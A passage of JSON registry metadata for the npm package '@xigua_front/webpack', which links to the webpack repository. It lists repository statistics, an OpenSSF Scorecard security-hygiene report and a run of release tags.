stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"xigua_front","versions_count":1,"first_release_published_at":"2019-01-10T05:29:19.741Z","latest_release_published_at":"2019-01-10T05:29:19.741Z","latest_release_number":"1.0.0","last_synced_at":"2026-09-03T00:29:57.852Z","created_at":"2022-04-08T22:44:00.647Z","updated_at":"2026-09-03T00:29:57.853Z","registry_url":"https://www.npmjs.com/package/@xigua_front/webpack","install_command":"npm install @xigua_front/webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.0"}},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","k